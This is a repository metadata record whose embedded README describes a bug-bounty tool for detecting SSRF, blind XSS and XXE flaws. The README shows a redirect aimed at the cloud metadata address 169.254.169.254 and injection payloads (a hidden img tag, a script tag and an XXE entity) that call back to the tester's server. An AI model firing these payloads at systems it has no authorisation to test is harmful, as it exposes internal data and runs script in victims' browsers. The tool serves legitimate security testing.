{"id":13542132,"url":"https://github.com/jobertabma/ground-control","last_synced_at":"2025-04-06T02:12:34.738Z","repository":{"id":78651307,"uuid":"94038764","full_name":"jobertabma/ground-control","owner":"jobertabma","description":"A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.","archived":false,"fork":false,"pushed_at":"2017-06-12T20:51:38.000Z","size":49,"stargazers_count":541,"open_issues_count":1,"forks_count":96,"subscribers_count":33,"default_branch":"master","last_synced_at":"2025-03-30T01:11:52.926Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jobertabma.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-06-11T23:49:17.000Z","updated_at":"2025-03-27T13:16:28.000Z","dependencies_parsed_at":null,"dependency_job_id":"e9d1c6c1-1089-436b-bfb6-7feb05854d9c","html_url":"https://github.com/jobertabma/ground-control","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jobertabma%2Fground-control","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jobertabma%2Fground-control/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jobertabma%2Fground-control/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jobertabma%2Fground-control/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jobertabma","download_url":"https://codeload.github.com/jobertabma/ground-control/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247423516,"owners_count":20936626,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T10:01:01.753Z","updated_at":"2025-04-06T02:12:34.718Z","avatar_url":"https://github.com/jobertabma.png","language":"Ruby","readme":"# Ground control\nThis is a collection of most of my scripts that I use to debug Server Side Request Forgery (SSRF), blind XSS, and insecure XXE processing vulnerabilities. This is still a work in progress, as I'm still collecting all the scripts that I have lingering around. Before using these scripts, I used to rewrite these scripts most of the time or set up listeners with `netcat`. That wasn't scalable, so I started collecting the scripts in a repository, which can be closed easily every time it's needed it on a server.\n\n## Requirements\nRunning this script requires Ruby 2.3, a valid SSL certificate for a domain you own, and a web server that allows to open port `80`, `443`, `8080`, and `8443`. Port `80` and `443` are used to serve simple web traffic. Port `8080` is an alternative HTTP port that can be useful when traffic on port `80` is blocked. Port `8443` is an alternative port for HTTPS traffic, with the difference that it serves a self-signed SSL certificate. I use this port to determine whether the server does SSL certificate validation. It does not warrant a security report by itself, but is often useful to mention when you're filing the SSRF vulnerability.\n\n## Setting up\nClone this repository and install the required components by running `install.sh`. After that, run `start.sh` to start to listen on all ports. For now, `root` privileges are required because it listens on port `80` and `443`. A future version might solve this problem by switching to a different user context after startup.\n\n## Functions\n\n### Redirects\nThe `/redirect` endpoint is used to redirect a request to another server or endpoint. This may assist you when you need an external server to redirect back to an internal system. See below for examples.\n\n```\ncurl -vv \"http://server/redirect?url=http://169.254.169.254/latest/meta-data/\"\n```\n\n### Ping Pong\nSometimes, you simply need a page that responds with a certain body and headers. The `/ping_pong` endpoint does exactly that. Here's a few examples.\n\n```\ncurl -vv \"http://server/ping_pong?body=%3ch1%3eHello%3c/h1%3e\"\n```\n\n### Blind callbacks\nTo figure out of an inaccessible system is executing your HTML or XSS payload, add an item the `callback_tokens` in `config.json`. The structure is shown below. This callback contains information where you injected your payload. This will help you identify the root cause of the vulnerability if you receive a callback. Every unique combination of parameter, host, port, path, and method is supposed to have its own `callback_token`.\n\n```\n{\n  \"callback_tokens\": {\n    \"ee34a1791ab345f789\": {\n      \"host\": \"hackerone.com\",\n      \"port\": 443,\n      \"ssl\": true,\n      \"path\": \"/webhooks\",\n      \"parameter\": \"url\",\n      \"method\": \"POST\"\n    }\n  }\n}\n```\n\nDepending on what type of vulnerability you want to test for, you have to construct a payload. See below for an example for HTML injections and XSS vulnerabilities. Then, submit the payload to the injection point. You'll see a log entry in `logs/access_log` when a request with that `callback_token` was triggered. Most of the time, I use `tail -f logs/access_log` to see if something triggered.\n\n**HTML injection**\n```\n\u003cimg src=\"https://server/pixel?callback_token=ee34a1791ab345f789\" style=\"display:none;\"/\u003e\n```\n\n**Blind XSS**\n```\n\u003cscript src=\"https://server/collect?callback_token=ee34a1791ab345f789\"\u003e\u003c/script\u003e\n```\n\n**XXE**\n```\n\u003c?xml version=\"1.0\" ?\u003e\n\u003c!DOCTYPE r [\n\u003c!ELEMENT r ANY \u003e\n\u003c!ENTITY sp SYSTEM \"http://server/pixel?callback_token=ee34a1791ab345f789\"\u003e\n]\u003e\n\u003cr\u003e\u0026sp;\u003c/r\u003e\n```\n\n### Starting another server\nThe server listens on port `80`, `443`, `8080`, and `8443` by default. However, if you want to start another server on a different port, run `ruby app/server.rb -p :port`. To use SSL, append `-cert :cert.pem`. This is especially useful when a potential SSRF vulnerability only allows to connect on certain ports. Say bye to all the Apache and nginx configuration hacking!\n","funding_links":[],"categories":["Exploitation"],"sub_categories":["Server Side Request Forgery","XXE Injection"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjobertabma%2Fground-control","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjobertabma%2Fground-control","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjobertabma%2Fground-control/lists"}